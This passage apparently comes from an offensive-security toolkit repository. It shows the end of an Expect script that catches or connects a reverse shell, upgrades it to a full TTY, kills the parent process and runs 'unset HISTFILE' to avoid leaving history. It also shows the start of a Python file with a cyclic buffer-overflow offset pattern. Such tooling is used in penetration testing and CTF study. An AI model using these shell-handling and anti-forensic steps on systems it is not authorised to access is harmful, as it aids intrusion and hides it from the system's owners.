116 | 					puts "\[\033\[94m*\033\[0m\] Setting terminal"
117 | 					expect ":"
118 | 					send "stty raw -echo\n"
119 | 					send "fg\n"
120 | 					expect {
121 | 						"$ " {
122 | 						}
123 | 						"# " {
124 | 						}
125 | 						"% " {
126 | 						}
127 | 					}
128 | 					send "kill -s 9 `ps -fp \$PPID | awk \"/\$PPID/\"' { print \$3 } '`\n"
129 | 					send "reset\n"
130 | 					expect {
131 | 						"$ " {
132 | 						}
133 | 						"# " {
134 | 						}
135 | 						"% " {
136 | 						}
137 | 					}
138 | 					send "id\n"
139 | 					expect {
140 | 						"Terminal type?" {
141 | 							send "xterm-256color\n"
142 | 						}
143 | 						"uid=" {
144 | 						}
145 | 					}
146 | 					send "stty rows $ROWS columns $COLS\n"
147 | 					send "export SHELL=bash\n"
148 | 					send "export TERM=xterm-256color\n"
149 | 					send "unset HISTFILE\n"
150 | 					send "clear\n"
151 | 					#send "uname -a; id\n"
152 | 					sleep 0.5
153 | 					interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\n" return
154 | 					
155 | 				}
156 | 				"PYTHON-ERR" {
157 | 					puts "\[\033\[91m-\033\[0m\] python not found"
158 | 					puts "\[\033\[92m+\033\[0m\] Interacting"
159 | 					send "uname -a; id\n"
160 | 					interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return
161 | 				}
162 | 			}
163 | 			puts ""
164 | 			puts "\[\033\[94m*\033\[0m\] Terminated"
165 | 		}
166 | 		"Connection refused" {
167 | 			puts "\[\033\[91m-\033\[0m\] Connection refused"
168 | 		}
169 | 		"Permission denied" {
170 | 			puts "\[\033\[91m-\033\[0m\] Permission denied"
171 | 		}
172 | 		"forward host lookup failed" {
173 | 			puts "\[\033\[91m-\033\[0m\] Forward host lookup failed"
174 | 		}
175 | 		"Cannot assign requested address" {
176 | 			puts "\[\033\[91m-\033\[0m\] Cannot assign requested address"
177 | 		}
178 | 		"invalid port" {
179 | 			puts "\[\033\[91m-\033\[0m\] Invalid port"
180 | 		}
181 | 		"invalid local port" {
182 | 			puts "\[\033\[91m-\033\[0m\] Invalid local port"
183 | 		}
184 | 		"Address already in use" {
185 | 			puts "\[\033\[91m-\033\[0m\] Address already in use"
186 | 		}
187 | 		"*** buffer overflow detected ***" {
188 | 			puts "\[\033\[91m-\033\[0m\] *** buffer overflow detected ***"
189 | 		}
190 | 	}
191 | 	exit
192 | } else {
193 | 	puts "Usage: $::argv0 \[-l\] \[-t\] \[addr\] port"
194 | }
195 | 


--------------------------------------------------------------------------------
/Binary/pattern.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | import sys, os, binascii, time
  4 | import sploit
  5 | 
  6 | buf = (
  7 | "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac"
  8 | "6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2A"
  9 | "f3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
 10 | "Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak"
 11 | "6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"
 12 | "n3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9"
 13 | "Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As"
 14 | "6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2A"
 15 | "v3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"
 16 | "Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba"
 17 | "6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2B"
 18 | "d3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9"
 19 | "Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi"
 20 | "6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2B"
 21 | "l3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9"
 22 | "Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq"
 23 | "6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2B"
 24 | "t3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9"
 25 | "Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By"
 26 | "6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C"
 27 | "b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9"
 28 | "Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg"
 29 | "6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2C"
 30 | "j3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9"
 31 | "Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
 32 | "6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2C"
 33 | "r3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9"
 34 | "Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw"
 35 | "6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2C"
 36 | "z3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9"
 37 | "Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De"
 38 | "6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2D"
 39 | "h3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9"
 40 | "Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm"
 41 | "6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2D"
 42 | "p3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9"
 43 | "Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du"
 44 | "6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2D"
 45 | "x3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9"
 46 | "Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec"
 47 | "6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2E"
 48 | "f3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9"
 49 | "Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek"
 50 | "6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2E"
 51 | "n3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9"
 52 | "Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es"
 53 | "6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2E"
 54 | "v3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9"
 55 | "Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa"
 56 | "6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F"
 57 | "d3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9"
 58 | "Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi"
 59 | "6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2F"
 60 | "l3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9"
 61 | "Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq"
 62 | "6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2F"
 63 | "t3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9"
 64 | "Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy"
 65 | "6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2G"
 66 | "b3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9"
 67 | "Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg"
 68 | "6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2G"
 69 | "j3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9"
 70 | "Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go"
 71 | "6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2G"
 72 | "r3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9"
 73 | "Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw"
 74 | "6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2G"
 75 | "z3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9"
 76 | "Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He"
 77 | "6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2H"
 78 | "h3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9"
 79 | "Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm"
 80 | "6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2H"
 81 | "p3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9"
 82 | "Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu"
 83 | "6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2H"
 84 | "x3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9"
 85 | "Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic"
 86 | "6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2I"
 87 | "f3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9"
 88 | "Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik"
 89 | "6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2I"
 90 | "n3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9"
 91 | "Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is"
 92 | "6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2I"
 93 | "v3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9"
 94 | "Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja"
 95 | "6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2J"
 96 | "d3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9"
 97 | "Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji"
 98 | "6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2J"
 99 | "l3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9"
100 | "Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq"
101 | "6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2J"
102 | "t3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9"
103 | "Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy"
104 | "6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2K"
105 | "b3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9"
106 | "Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg"
107 | "6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2K"
108 | "j3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9"
109 | "Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko"
110 | "6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2K"
111 | "r3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9"
112 | "Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw"
113 | "6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2K"
114 | "z3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9"
115 | "Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le"
116 | "6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2L"
117 | "h3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9"
118 | "Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm"
119 | "6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2L"
120 | "p3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9"
121 | "Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu"
122 | "6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2L"
123 | "x3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9"
124 | "Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc"
125 | "6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2M"
126 | "f3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9"
127 | "Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk"
128 | "6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2M"
129 | "n3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9"
130 | "Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms"
